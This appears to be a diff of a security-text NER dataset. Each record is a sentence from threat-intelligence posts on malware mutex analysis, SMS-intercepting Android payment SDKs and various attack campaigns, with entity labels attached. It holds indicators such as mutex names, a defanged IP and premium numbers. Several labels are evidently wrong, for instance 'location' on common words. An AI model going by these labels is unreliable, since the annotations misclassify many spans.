example, the resource being protected isn’t the right to speak, as many might think, but rather the ability to listen.","entities":[],"relations":[],"Comments":[]} -{"id":1091,"text":" Here’s a more technical example.","entities":[],"relations":[],"Comments":[]} -{"id":1092,"text":"Lets say you want to update an Internet Explorer (IE) cookie file, adding a unique identifier for use later.","entities":[{"id":44932,"label":"SOFTWARE","start_offset":31,"end_offset":53}],"relations":[],"Comments":[]} -{"id":1093,"text":"Naively, what you need to do is read the cookie file in, add your data to what you’ve read, and write the file back to disk.","entities":[],"relations":[],"Comments":[]} -{"id":1094,"text":"But what if IE is running and also updating that file?","entities":[{"id":46565,"label":"SOFTWARE","start_offset":12,"end_offset":14}],"relations":[],"Comments":[]} -{"id":1095,"text":"The worst case, for you, is that both you and IE read the file at the same time but you write your edits first.","entities":[{"id":46566,"label":"SOFTWARE","start_offset":46,"end_offset":48}],"relations":[],"Comments":[]} -{"id":1096,"text":"This is because IE will completely destroy your edits when it writes its new version of the file over yours.","entities":[{"id":46567,"label":"SOFTWARE","start_offset":16,"end_offset":18}],"relations":[],"Comments":[]} -{"id":1097,"text":" The solution to this problem is to use a mutex to protect the integrity of the cookie file.","entities":[],"relations":[],"Comments":[]} -{"id":1098,"text":"A process that has the mutex knows that while it holds that mutex no other process will be accessing the cookie file.","entities":[],"relations":[],"Comments":[]} -{"id":1099,"text":"It can then read, tweak, and write the file without fear of any clobbering by other processes.","entities":[],"relations":[],"Comments":[]} -{"id":1100,"text":" Since each shared resource can only have a single mutex effectively protecting it, leveraging that mutex is indication that a program will be using said resource.","entities":[],"relations":[],"Comments":[]} -{"id":1101,"text":"In the cookie file example above, just referencing the mutex protecting that file indicates, with extremely high probability, that functionality to change the file exists somewhere in the program.","entities":[],"relations":[],"Comments":[]} -{"id":1102,"text":" Any given mutex, and protected functionality, can then be thought of as an independent library of sorts.","entities":[],"relations":[],"Comments":[]} -{"id":1103,"text":"Note that while the technical implementation may not expose said functionality as a normal library, such exposure is not necessary for the types of analysis performed here.","entities":[],"relations":[],"Comments":[]} -{"id":1104,"text":"That library’s usage can be analyzed in terms of who uses it.","entities":[],"relations":[],"Comments":[]} -{"id":1105,"text":"Simply put: malware writers leverage malware specific libraries and groups of like actors will reuse these core libraries when able. The needle in a haystack problem forever plagues malware research: it’s extremely difficult to find reliable information with malware writers constantly working to undermine or eliminate that information.","entities":[],"relations":[],"Comments":[]} -{"id":1106,"text":"But, in the case of mutex analysis, the useful information pretty well slapped us in the face.","entities":[],"relations":[],"Comments":[]} -{"id":1107,"text":" As can be clearly seen, mutex 2gvwnqjz1 is strongly associated with malware.","entities":[],"relations":[],"Comments":[]} -{"id":1108,"text":"In fact, we have only seen it in malware.","entities":[],"relations":[],"Comments":[]} -{"id":1109,"text":" As is equally obvious, not all mutexes offer such dramatic insight.","entities":[],"relations":[],"Comments":[]} -{"id":1110,"text":"There are many common mutexes shared across both benign software and malware.","entities":[],"relations":[],"Comments":[]} -{"id":1111,"text":"What’s more, they don’t all share millions of uses across both sides of the fence.","entities":[],"relations":[],"Comments":[]} -{"id":1112,"text":" In cases such as these the common approach is to use sets of the data, in this case sets of mutexes, to create fingerprints of each sample and then leverage those fingerprints to extract higher confidence classification decisions.","entities":[],"relations":[],"Comments":[]} -{"id":1113,"text":"While this avenue of research is being pursued, it suffers from all the traditional challenges of big data research.","entities":[],"relations":[],"Comments":[]} -{"id":1114,"text":"In other words, it’s slow going.","entities":[],"relations":[],"Comments":[]} -{"id":1115,"text":" In parallel, and to inform better hypothesis for the fingerprint generation, research is being done to determine how far single mutex analysis can take us.","entities":[],"relations":[],"Comments":[]} -{"id":1116,"text":"The research is ongoing but the initial results are extremely promising.","entities":[],"relations":[],"Comments":[]} -{"id":1117,"text":" The number of times any single mutex is used drops rapidly from the millions of samples down to thousands and from there, even further.","entities":[],"relations":[],"Comments":[]} -{"id":1118,"text":"Tens of thousands of the mutexes have been seen in only a single sample each.","entities":[],"relations":[],"Comments":[]} -{"id":1119,"text":"This results in a few hundred thousand individual mutexes available for further analysis.","entities":[],"relations":[],"Comments":[]} -{"id":1120,"text":" What quickly becomes apparent is that a large majority of the mutexes provide no obvious means to automatically classify them as necessarily indicative of good or bad behavior.","entities":[],"relations":[],"Comments":[]} -{"id":1121,"text":"And, unfortunately, the ones, which are reasonably easy for a human to identify, are so for significantly different reasons.","entities":[],"relations":[],"Comments":[]} -{"id":1122,"text":"For example, “autoproto_*” -- More than 20 mutexes share that preface, offering a natural fingerprint.","entities":[],"relations":[],"Comments":[]} -{"id":1123,"text":" “global\\setup_028746_mutexitem” -- Associated solely with known malware digital signers.","entities":[],"relations":[],"Comments":[]} -{"id":1124,"text":" “defined_setnocandy” -- After reading mutex names for a few hours this just sticks out like a sore thumb.","entities":[{"id":3460,"label":"TIME","start_offset":56,"end_offset":67}],"relations":[],"Comments":[]} -{"id":1125,"text":" Only the first of the examples had the mutex associated with a vast majority of malware samples.","entities":[],"relations":[],"Comments":[]} -{"id":1126,"text":"This implies that any fully automated association of a mutex to either benign or malware samples will itself require complex fingerprinting and confidence models.","entities":[],"relations":[],"Comments":[]} -{"id":1127,"text":" Full automation is always the ideal but it isn’t always necessary.","entities":[],"relations":[],"Comments":[]} -{"id":1128,"text":"With the appropriate tools it’s possible to enable a single researcher to continually review and categorize new mutexes.","entities":[],"relations":[],"Comments":[]} -{"id":1129,"text":"The initial classifications to be used are “benign”, “malware”, or “statistical”.","entities":[],"relations":[],"Comments":[]} -{"id":1130,"text":"Meaning that the mutex either itself indicates a benign or malware sample, or that the mutex alone is not enough to make a determination and the statistical ratio of benign to malware is the best it can offer.","entities":[],"relations":[],"Comments":[]} -{"id":1131,"text":" The backlog of already collected mutexes is too great for a small team of researchers to meaningfully tackle without some kind of ranking system.","entities":[],"relations":[],"Comments":[]} -{"id":1132,"text":"Luckily, the most objective piece of data collected about each mutex, how many samples were classified benign vs. malware, has all the information necessary to ensure that the researchers’ tackle the low hanging fruit first.","entities":[],"relations":[],"Comments":[]} +{"id":1311,"text":"These results are encrypted using the same technique mentioned previously.","entities":[],"relations":[],"Comments":[]} +{"id":1496,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} +{"id":8151,"text":"Google Play URL of FileManager app found in one of the C&C servers.","entities":[],"relations":[],"Comments":[]} +{"id":449,"text":" This is a case where forewarned is forearmed, and that forearming can result in effective prevention. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} +{"id":2340,"text":"It needed the address of dlopen and dlsym patched after the binary was loaded into memory.","entities":[],"relations":[],"Comments":[]} +{"id":9114,"text":"Figure 1. Exploit loading sequence in ria[.]ru (February 2012) Figure 2. [bg].ru (February 2012) found redirecting victims to Lurk\u2019s exploit kit Figure 3. Redirects to the Lurk landing page from adfox[.]ru banner network Figure 4. Malicious iframe content served by tks[.]ru (August 2013)","entities":[{"id":28138,"label":"threat-actor","start_offset":126,"end_offset":130},{"id":28140,"label":"malware","start_offset":172,"end_offset":176},{"id":28141,"label":"location","start_offset":177,"end_offset":184},{"id":28142,"label":"location","start_offset":185,"end_offset":189},{"id":28143,"label":"location","start_offset":206,"end_offset":212},{"id":28145,"label":"location","start_offset":248,"end_offset":255}],"relations":[],"Comments":[]} +{"id":2600,"text":"To this end, we are aware of this actor\u2019s involvement in vishing, SIM-swapping and soliciting third parties at providers for insider access.","entities":[],"relations":[],"Comments":[]} +{"id":2187,"text":"In this attack, attackers embedded the TDrop2 malware inside a legitimate video software package hosted on the software distributor\u2019s website.","entities":[{"id":45419,"label":"malware","start_offset":39,"end_offset":45}],"relations":[],"Comments":[]} +{"id":11704,"text":"Non-malicious applications \u201cMy First APP\u201d and \u201cOpinion Poll\u201d Another two applications were built from JavaPayload for Metasploit that will load extra code from the remote server configured in the sample.","entities":[{"id":36069,"label":"location","start_offset":42,"end_offset":45},{"id":36072,"label":"malware","start_offset":122,"end_offset":132},{"id":36073,"label":"location","start_offset":138,"end_offset":142},{"id":36074,"label":"location","start_offset":143,"end_offset":147},{"id":36075,"label":"location","start_offset":168,"end_offset":174},{"id":36076,"label":"location","start_offset":200,"end_offset":206}],"relations":[],"Comments":[]} +{"id":5088,"text":"In other cases, we observed fake websites \u2014 already set up to distribute trojanized cryptocurrency applications \u2014 hosting iframes and pointing their visitors to the exploit kit.","entities":[],"relations":[],"Comments":[]} +{"id":5356,"text":"The MTD provides an abstraction layer to access the device's flash memory.","entities":[],"relations":[],"Comments":[]} +{"id":779,"text":"From a researchers' point of view, deferred free created a few problems, one of the major ones being that the page heap feature may not work correctly.","entities":[],"relations":[],"Comments":[]} +{"id":5335,"text":"10 bytes are then written to the core component pipe.","entities":[],"relations":[],"Comments":[]} +{"id":4768,"text":"We ensure appropriate controls are built into the architecture of the system.","entities":[],"relations":[],"Comments":[]} +{"id":13783,"text":"An unusual Waterbear infection chain","entities":[],"relations":[],"Comments":[]} +{"id":8876,"text":"If the creation of the tool, batch file, and scheduled task is disregarded, it would seem that there is no connection between PlugX and the execution of the auxiliary tool.","entities":[{"id":27454,"label":"location","start_offset":23,"end_offset":27},{"id":27455,"label":"location","start_offset":41,"end_offset":44},{"id":27456,"label":"attack-pattern","start_offset":45,"end_offset":59},{"id":27457,"label":"location","start_offset":118,"end_offset":125},{"id":27458,"label":"malware","start_offset":126,"end_offset":131},{"id":27459,"label":"location","start_offset":132,"end_offset":135},{"id":27460,"label":"location","start_offset":167,"end_offset":171}],"relations":[],"Comments":[]} +{"id":9430,"text":"This is done by hooking NTDLL APIs such as NtQueryAttributesFile, NtOpenFile, NtCreateSection, NtMapViewOfSection, NtQuerySection and ZwClose.","entities":[{"id":29017,"label":"attack-pattern","start_offset":16,"end_offset":23},{"id":29018,"label":"location","start_offset":130,"end_offset":133}],"relations":[],"Comments":[]} +{"id":5486,"text":"He claimed that he wasn\u2019t able to install the app.","entities":[],"relations":[],"Comments":[]} +{"id":13662,"text":"How accounts are targeted for phishing attacks","entities":[{"id":42527,"label":"attack-pattern","start_offset":30,"end_offset":38}],"relations":[],"Comments":[]} +{"id":5555,"text":" It goes without saying that you should keep a close eye on your card statements\/bank account at all times \u2013 watching out even for small amounts that hackers may be making to test if your card is still active.","entities":[],"relations":[],"Comments":[]} +{"id":352,"text":"Yesterday, TrustedSec, a security consultancy based on Ohio, wrote that the recent breach at Community Health Systems (CHS) was the result of exploitation of the Heartbleed OpenSSL vulnerability (CVE-2014-0160).","entities":[{"id":46042,"label":"TIME","start_offset":0,"end_offset":9},{"id":46043,"label":"identity","start_offset":11,"end_offset":21},{"id":46044,"label":"location","start_offset":55,"end_offset":59},{"id":46045,"label":"identity","start_offset":93,"end_offset":123},{"id":46047,"label":"vulnerability","start_offset":196,"end_offset":209},{"id":46046,"label":"vulnerability","start_offset":162,"end_offset":194}],"relations":[],"Comments":[]} +{"id":5821,"text":"Ed:","entities":[],"relations":[],"Comments":[]} +{"id":6628,"text":"A recent report uncovered this threat group\u2019s attack infrastructure, which leveraged commercial VPN providers in addition to compromised systems to use as proxies to further mask their origins.","entities":[{"id":20569,"label":"threat-actor","start_offset":174,"end_offset":178}],"relations":[],"Comments":[]} +{"id":6398,"text":" Examining additional connections to port 443 on 159.65.186[.]50, we identified several suspected victims including an Argentinian organization, an IP television provider providing North and South American content, and a major textile manufacturer in Mexico.","entities":[{"id":19849,"label":"IPV4","start_offset":49,"end_offset":64},{"id":19852,"label":"location","start_offset":206,"end_offset":213},{"id":19853,"label":"location","start_offset":215,"end_offset":218},{"id":19854,"label":"location","start_offset":221,"end_offset":226}],"relations":[],"Comments":[]} +{"id":8801,"text":"In one example, attackers impersonated McAfee.","entities":[],"relations":[],"Comments":[]} +{"id":459,"text":" Attackers use DGA so that they can quickly switch the domains that they\u2019re using for the malware attacks.","entities":[],"relations":[],"Comments":[]} +{"id":13112,"text":" Tags APT & Targeted Attacks | IoT | Expert Perspective | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} +{"id":14043,"text":"There seems to be a neat way to do it, but I seek advice from experienced people.\u201d","entities":[],"relations":[],"Comments":[]} +{"id":13119,"text":"Marketplace Vendor Insights takes the pain out of due diligence by delivering the information prospective customers need\u2014reducing friction and accelerating the journey to cloud security.","entities":[],"relations":[],"Comments":[]} +{"id":279,"text":"Unlike a new malware family or vulnerability in the wild, the attacks we expect could come in many forms.","entities":[],"relations":[],"Comments":[]} +{"id":7715,"text":" Figure 11. .LNK embedded in the .ISO file","entities":[],"relations":[],"Comments":[]} +{"id":4583,"text":"More startling is the fact that 18.6% of all disclosures were published without a fix from the vendor\u2014another record-breaking stat.","entities":[],"relations":[],"Comments":[]} +{"id":874,"text":" The following sample is used for analysis: Figure 1.","entities":[],"relations":[],"Comments":[]} +{"id":5726,"text":" Spear phishing, like the name implies, is a more targeted form of phishing which incorporates a theme directly related to the target.","entities":[{"id":17696,"label":"attack-pattern","start_offset":1,"end_offset":15},{"id":17697,"label":"attack-pattern","start_offset":67,"end_offset":75},{"id":17698,"label":"location","start_offset":127,"end_offset":133}],"relations":[],"Comments":[]} {"id":1133,"text":" With over hundreds of thousands of malware associations, this specific mutex is associated exclusively with the Net-worm:W32\/Allaple malware family which has been around since 2006 but continues to propagate and reinvent itself through the years.","entities":[{"id":46569,"label":"malware","start_offset":113,"end_offset":133},{"id":46570,"label":"TIME","start_offset":177,"end_offset":181}],"relations":[],"Comments":[]} -{"id":1134,"text":" Though the fact that the malware writer obviously named the mutex by rolling their face on the keyboard made it obvious before we'd done any further analysis that we’d found a unique identifier within the binaries.","entities":[],"relations":[],"Comments":[]} -{"id":1135,"text":" This malware is well documented as a powerful polymorphic worm that encrypts itself differently every time it propagates.","entities":[],"relations":[],"Comments":[]} -{"id":1136,"text":"The evasive nature of this malware family leads to a different file hash, import hash, and only a 20% average SSDeep hash overlap between the samples.","entities":[{"id":46571,"label":"tools","start_offset":110,"end_offset":116}],"relations":[],"Comments":[]} -{"id":1137,"text":"But because the mutex name is set at compile time, the mutex itself offers a common thread between all of the samples we collected and analyzed.","entities":[],"relations":[],"Comments":[]} -{"id":1138,"text":" However, this particular mutex was associated with only a recent subset of the Allaple family.","entities":[{"id":46572,"label":"malware","start_offset":80,"end_offset":87}],"relations":[],"Comments":[]} -{"id":1139,"text":" Unlike many other avenues of research and classification, mutex name based associations provides an almost trivial means of uniquely identifying common code blocks and thereby malware families.","entities":[],"relations":[],"Comments":[]} -{"id":1140,"text":"The first thing our researchers noticed was the similarity between this mutex name and the previous one.","entities":[],"relations":[],"Comments":[]} -{"id":1141,"text":"While programmatic analysis would have a hard time associating the two, it's obvious to a human that the same face rolling technique was used to name this mutex.","entities":[],"relations":[],"Comments":[]} -{"id":1142,"text":"The author simply rolled around a bit more.","entities":[],"relations":[],"Comments":[]} -{"id":1143,"text":" Quick follow up analysis revealed that this mutex was also associated with the Allaple malware family.","entities":[{"id":3512,"label":"malware","start_offset":80,"end_offset":87}],"relations":[],"Comments":[]} -{"id":1144,"text":"More interestingly, it was another, non-overlapping, subset of the Allaple family.","entities":[{"id":3513,"label":"malware","start_offset":67,"end_offset":74}],"relations":[],"Comments":[]} -{"id":1145,"text":"Several hypotheses followed directly from this observation.","entities":[],"relations":[],"Comments":[]} -{"id":1146,"text":" Absolute proof for a few of these hypotheses may never be realized.","entities":[],"relations":[],"Comments":[]} -{"id":1147,"text":"However, and lucky for us, the malware author was arrested in 2010 so several of the hypothesis can be verified.","entities":[{"id":46573,"label":"TIME","start_offset":62,"end_offset":66}],"relations":[],"Comments":[]} -{"id":1148,"text":" The first is very likely due to the similarities present in the order of keys hit.","entities":[],"relations":[],"Comments":[]} -{"id":1149,"text":"Both begin with “jhd”.","entities":[],"relations":[],"Comments":[]} -{"id":1150,"text":"“jh” itself is more common than would be expected given that, with fingers on the home row, it requires the right index finger to move and press another key before any other key is struck.","entities":[],"relations":[],"Comments":[]} -{"id":1151,"text":"And “jh” is always followed by a key from the left side of the keyboard.","entities":[],"relations":[],"Comments":[]} -{"id":1152,"text":"These unique consistencies make it extremely improbable that two different people named these mutexes.","entities":[],"relations":[],"Comments":[]} -{"id":1153,"text":" The second mutex appears to be a concerted effort to make the mutex seem “more random” than the first.","entities":[],"relations":[],"Comments":[]} -{"id":1154,"text":"It's immediately obvious that the author didn't move his fingers\/hands much while typing the first.","entities":[],"relations":[],"Comments":[]} -{"id":1155,"text":"It’s obvious enough that the author likely noticed it when reworking this section of code.","entities":[],"relations":[],"Comments":[]} -{"id":1156,"text":"It's highly improbable that one would see the second mutex and make a concerted effort to make it appear “less random”.","entities":[],"relations":[],"Comments":[]} -{"id":1157,"text":"And, as can be quickly verified by searching through standard virus detection logs, the mutexes did in fact appear in the hypothesized order.","entities":[],"relations":[],"Comments":[]} -{"id":1158,"text":" The third is likely due to the lack of overlap between mutex names.","entities":[],"relations":[],"Comments":[]} -{"id":1159,"text":"However, the research necessary to conclusively prove this hypothesis would be very time consuming and provide little other benefit.","entities":[],"relations":[],"Comments":[]} -{"id":1160,"text":" The fourth is likely due to the mutexes only appearing in a single malware family.","entities":[],"relations":[],"Comments":[]} -{"id":1161,"text":"If this functionality were available in some more open source setting, and was of even moderate quality, we would expect to see it used in other malware families as well.","entities":[],"relations":[],"Comments":[]} -{"id":1162,"text":"As this functionality has not migrated outside the Allaple family, either the quality of the code is bad (see: face rolling), or it's simply not available to other malware developers. The fifth is very likely as a change to the specific functionality these mutexes protect, with every change to any functionality, is simply not a practical method of development.","entities":[{"id":46578,"label":"malware","start_offset":51,"end_offset":58}],"relations":[],"Comments":[]} -{"id":1163,"text":"And indeed, as with the second hypothesis, standard virus detection logs prove that each of these mutexes do span multiple variants of the worm.","entities":[],"relations":[],"Comments":[]} -{"id":1164,"text":" Mutex names provide a window into the entire development process and timeline for malware.","entities":[],"relations":[],"Comments":[]} -{"id":1165,"text":"Idiosyncrasies of the malware author become apparent, the evolution can be traced, the availability or quality of code deduced, and reuse of functionality made clear with a simple mutex.","entities":[],"relations":[],"Comments":[]} -{"id":1166,"text":"No other currently used method of analysis offers such a personal view into malware development.","entities":[],"relations":[],"Comments":[]} -{"id":1167,"text":" Mutex name analysis as a whole offers a unique look into the results of any sample classification system and the malware therein.","entities":[],"relations":[],"Comments":[]} -{"id":1168,"text":"While the research may never result in a fully automated decision system, it has been proven that researchers employing a hybrid approach to analysis will be able to provide critical and timely information to support the continual improvement of the classification system as a whole.","entities":[],"relations":[],"Comments":[]} -{"id":1169,"text":" From edge case to systematic misclassifications, mutex usage is even more generally the canary in a coal mine than was previously realized. While tedious and time consuming, combing through mutex names did come with more than a few good laughs.","entities":[],"relations":[],"Comments":[]} -{"id":1170,"text":"After nearly as much debate as some of the real research, we’ve whittled the list down to our favorites (For the curious, these are all malware mutexes).","entities":[],"relations":[],"Comments":[]} -{"id":1171,"text":"Enjoy.","entities":[],"relations":[],"Comments":[]} -{"id":1172,"text":"Pluguin - When penguins and wall sockets mate.","entities":[],"relations":[],"Comments":[]} -{"id":1173,"text":"Development environments don’t have spell check but, maybe they should.","entities":[],"relations":[],"Comments":[]} -{"id":1174,"text":" senna spy rock in rio 2001 virus - Subtlety.","entities":[{"id":46580,"label":"malware","start_offset":1,"end_offset":27}],"relations":[],"Comments":[]} -{"id":1175,"text":"Overwhelming.","entities":[],"relations":[],"Comments":[]} -{"id":1176,"text":"There were many variations on this one, Senna’s obviously proud of his work.","entities":[{"id":46581,"label":"identity","start_offset":40,"end_offset":46}],"relations":[],"Comments":[]} -{"id":1177,"text":" chinese-hacker-2 - We’re not sure which is worse: that this is a legitimate signature or a sad frame job.","entities":[],"relations":[],"Comments":[]} -{"id":1178,"text":"Either way, somebody needs their computer privileges revoked.","entities":[],"relations":[],"Comments":[]} -{"id":1179,"text":" mutexpolesskayaglush*.*svchost.comexefile\\shell\\open\\command %1 %*@ - Putting shell code in a mutex name is right on the border of brilliant and insane.","entities":[],"relations":[],"Comments":[]} -{"id":1180,"text":"We’ll leave that determination to the reader.","entities":[],"relations":[],"Comments":[]} -{"id":1181,"text":"mr_coolface - Really, not so much, no.","entities":[],"relations":[],"Comments":[]} -{"id":1182,"text":" don't stop me!","entities":[],"relations":[],"Comments":[]} -{"id":1183,"text":"i need some money!","entities":[],"relations":[],"Comments":[]} -{"id":1184,"text":"- http:\/\/www.monster.com\/ - don’t say we never did anything for you.","entities":[{"id":46582,"label":"URL","start_offset":2,"end_offset":25}],"relations":[],"Comments":[]} -{"id":1185,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":1186,"text":"Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} -{"id":1187,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":1188,"text":"In-App Purchase (IAP) has become a popular way to sell services and virtual items through mobile applications.","entities":[],"relations":[],"Comments":[]} -{"id":1189,"text":"In the Android ecosystem, in addition to the official IAP service by Google, there are many third-party IAP Software Development Kits (SDKs) spread around the world.","entities":[{"id":46584,"label":"identity","start_offset":69,"end_offset":75},{"id":46583,"label":"SOFTWARE","start_offset":7,"end_offset":14}],"relations":[],"Comments":[]} -{"id":1190,"text":" Some of these third-party SDKs provide IAP services based on existing online payment platforms.","entities":[],"relations":[],"Comments":[]} -{"id":1191,"text":"However, an increasingly popular method uses premium SMS.","entities":[],"relations":[],"Comments":[]} -{"id":1192,"text":"A primary reason for the popularity of SMS-based IAP is that it does not require Internet connectivity, just cell service.","entities":[],"relations":[],"Comments":[]} -{"id":1193,"text":"While this is more convenient for both users and developers, there are significant security concerns with using SMS-based IAP on Android.","entities":[{"id":46585,"label":"SOFTWARE","start_offset":129,"end_offset":136}],"relations":[],"Comments":[]} -{"id":1194,"text":" These concerns are detailed below.","entities":[],"relations":[],"Comments":[]} -{"id":1195,"text":" Installing an Android app with SMS-based IAP is almost equivalent to installing an “SMS manager” (or even a “contacts manager”) app on the phone.","entities":[{"id":46586,"label":"SOFTWARE","start_offset":15,"end_offset":22}],"relations":[],"Comments":[]} -{"id":1196,"text":"The reason is because most SMS-based IAP SDKs include comprehensive functionalities to monitor, manage, and even intercept a user’s SMS communication silently in the background, without any user interaction or knowledge.","entities":[],"relations":[],"Comments":[]} -{"id":1197,"text":"This is a critical point: these SMS-based IAPs are able to independently send, receive, or block any SMS to\/from any cellphone on which they are installed, without the user having any idea this is occurring.","entities":[],"relations":[],"Comments":[]} -{"id":1198,"text":"This can include receiving instructions from a cloud server under the control of the SDK author.","entities":[],"relations":[],"Comments":[]} -{"id":1199,"text":" Palo Alto Networks Wildfire, through custom SMS blocking policies, recently discovered eight different SMS-based IAP SDKs with this abusive functionality.","entities":[{"id":46588,"label":"SOFTWARE","start_offset":1,"end_offset":28}],"relations":[],"Comments":[]} -{"id":1200,"text":"Further investigation shows that these SDKs have been used in at least 25 different Android games in two third-party app markets, JoloPlay and Wanyx.","entities":[{"id":46589,"label":"SOFTWARE","start_offset":84,"end_offset":91},{"id":46590,"label":"SOFTWARE","start_offset":130,"end_offset":138},{"id":46591,"label":"SOFTWARE","start_offset":143,"end_offset":148}],"relations":[],"Comments":[]} -{"id":1201,"text":"17 of the top 50 games in JoloPlay contain at least one of these IAP SDKs.","entities":[{"id":46592,"label":"SOFTWARE","start_offset":26,"end_offset":34}],"relations":[],"Comments":[]} -{"id":1202,"text":"According to JoloPlay’s website, these 17 games have been downloaded and installed more than 1.7 million times.","entities":[{"id":46593,"label":"SOFTWARE","start_offset":13,"end_offset":22}],"relations":[],"Comments":[]} -{"id":1203,"text":"Most of them are pirated or repackaged from famous Android games, such as Plants vs. Zombies 2, Jewels Maze, Fishing Joy, and Where's My Water.","entities":[{"id":46594,"label":"SOFTWARE","start_offset":51,"end_offset":58},{"id":44936,"label":"SOFTWARE","start_offset":74,"end_offset":94},{"id":44937,"label":"SOFTWARE","start_offset":96,"end_offset":107},{"id":44938,"label":"SOFTWARE","start_offset":109,"end_offset":120},{"id":44939,"label":"SOFTWARE","start_offset":126,"end_offset":142}],"relations":[],"Comments":[]} -{"id":1204,"text":"According to Wanyx’s website, 12 of the 50 games in Wanyx’s suggested games column contain the discussed IAP SDKs.","entities":[{"id":46596,"label":"identity","start_offset":13,"end_offset":18},{"id":46597,"label":"identity","start_offset":52,"end_offset":58}],"relations":[],"Comments":[]} -{"id":1205,"text":" In Wildfire, we classify apps using these IAP SDKs as Potentially Unwanted Applications (PUA).","entities":[{"id":46599,"label":"SOFTWARE","start_offset":4,"end_offset":12}],"relations":[],"Comments":[]} -{"id":1206,"text":"The reason they are not marked as malware is because all SDKs require user interaction when making a purchase (e.g. user clicks on the agreement). However, these IAP SDKs are very dangerous to users because of what they are doing with a user’s SMS without his or her knowledge.","entities":[],"relations":[],"Comments":[]} -{"id":1207,"text":" Below are the details of eight SMS-based IAP SDKs discovered by Wildfire:","entities":[{"id":46600,"label":"SOFTWARE","start_offset":65,"end_offset":73}],"relations":[],"Comments":[]} -{"id":1208,"text":" All of the identified IAP SDKs use premium SMS to provide the IAP service.","entities":[],"relations":[],"Comments":[]} -{"id":1209,"text":"They implement code that will send SMS to pre-defined premium numbers (Figure 1).","entities":[],"relations":[],"Comments":[]} -{"id":1210,"text":"This code implementation is also abstracted in an interface for developers.","entities":[],"relations":[],"Comments":[]} -{"id":1211,"text":" However, in addition to sending, all of these IAP SDKs also implement a BroadcastReceiver and register it for SMS_RECEIVED actions (Figure 2). In addition, Umpay, WiPay, and NgstreamPay will also register a ContentObserver to monitor all changes in an SMS inbox (Figure 3). ","entities":[{"id":46601,"label":"SOFTWARE","start_offset":158,"end_offset":163},{"id":46602,"label":"SOFTWARE","start_offset":165,"end_offset":170},{"id":46603,"label":"SOFTWARE","start_offset":176,"end_offset":188}],"relations":[],"Comments":[]} -{"id":1212,"text":"After an SMS is received, these receivers and observers will check the originating number and\/or message body, and block the SMS by some policies (Figure 3 and Figure 4).","entities":[],"relations":[],"Comments":[]} -{"id":1213,"text":" For example, in Figure 4, the policy is defined as deleting SMS satisfying two conditions at the same time: 1. Message comes from the phone number “+8610658008” or “10658008” 2.","entities":[],"relations":[],"Comments":[]} -{"id":1214,"text":"The message body contains the term “You will use” (translated from Chinese shown in Figure 4).","entities":[],"relations":[],"Comments":[]} -{"id":1215,"text":"Some of these policies are hard-coded in the SDKs, e.g., in UmPay; but others are pre-fetched from cloud servers that are operated by the SDKs’ providers (Figure 5). ","entities":[{"id":46604,"label":"SOFTWARE","start_offset":60,"end_offset":65}],"relations":[],"Comments":[]} -{"id":1216,"text":"Again, all the functions mentioned above run silently in the background.","entities":[],"relations":[],"Comments":[]} -{"id":1217,"text":"Except for LinkSMSPayment, all the IAP SDKs listed in this post do not notify the user in any way that they are taking actions against the user’s daily SMS communication.","entities":[],"relations":[],"Comments":[]} -{"id":1218,"text":"Users have no idea if an SMS was blocked or if it was delivered.","entities":[],"relations":[],"Comments":[]} -{"id":1219,"text":" All of the IAP SDKs in this post target Chinese users.","entities":[],"relations":[],"Comments":[]} -{"id":1220,"text":"Both SMS sending and SMS blocking will only affect Android phones with a valid Chinese mobile phone number.","entities":[{"id":46605,"label":"SOFTWARE","start_offset":51,"end_offset":58}],"relations":[],"Comments":[]} -{"id":1221,"text":"Some of them will even check which SIM operator a user is using (Figure 6).","entities":[],"relations":[],"Comments":[]} -{"id":1223,"text":" An interesting observation is that half of these IAP SDKs implement the send and block SMS functions in separate codes.","entities":[],"relations":[],"Comments":[]} -{"id":1224,"text":"More specifically, the code was separated into two parts.","entities":[],"relations":[],"Comments":[]} -{"id":1225,"text":"One piece is embedded into Android apps or games for developers as a part of the source code.","entities":[{"id":46608,"label":"SOFTWARE","start_offset":27,"end_offset":34}],"relations":[],"Comments":[]} -{"id":1226,"text":"The other piece is included separately in the assets directory in APK files, and will be invoked by Java reflection in runtime (Figure 7).","entities":[],"relations":[],"Comments":[]} -{"id":1227,"text":"For example, JoloPay, WiPay, TPADPay and EgamePay follow this design exactly.","entities":[{"id":44941,"label":"SOFTWARE","start_offset":13,"end_offset":20},{"id":44942,"label":"SOFTWARE","start_offset":22,"end_offset":27},{"id":44943,"label":"SOFTWARE","start_offset":30,"end_offset":36},{"id":44945,"label":"SOFTWARE","start_offset":41,"end_offset":49}],"relations":[],"Comments":[]} -{"id":1228,"text":"AstepPay implements both sending and blocking in the “assets\/astep.bin” file.","entities":[{"id":46610,"label":"SOFTWARE","start_offset":0,"end_offset":8},{"id":46611,"label":"FILEPATH","start_offset":54,"end_offset":70}],"relations":[],"Comments":[]} -{"id":1229,"text":"This separation of functions may be intended to avoid detection by security products.","entities":[],"relations":[],"Comments":[]} -{"id":1230,"text":" SMS should not be used in payment or authentication for e-finance transactions.","entities":[],"relations":[],"Comments":[]} -{"id":1231,"text":"On the existing Android platforms it is very easy for any installed apps to send, intercept, or even forward SMS messages in background without any user knowledge or interaction.","entities":[{"id":46612,"label":"SOFTWARE","start_offset":16,"end_offset":23}],"relations":[],"Comments":[]} -{"id":1232,"text":"Previous attack cases, such as Zitmo and Cardbuyer, showed the risk of using SMS for payment authentication.","entities":[{"id":46613,"label":"malware","start_offset":31,"end_offset":36},{"id":46614,"label":"malware","start_offset":41,"end_offset":50}],"relations":[],"Comments":[]} -{"id":1233,"text":"For instance: To improve the security of IAP, some payment platforms try to add a verification step in order to confirm an SMS was really sent by the user, for example, it will ask the user to reply with certain text that was sent to a phone number specified by the user.","entities":[],"relations":[],"Comments":[]} -{"id":1234,"text":"However, two months ago, WildFire discovered a new Android malware, Cardbuyer, that circumvents this verification 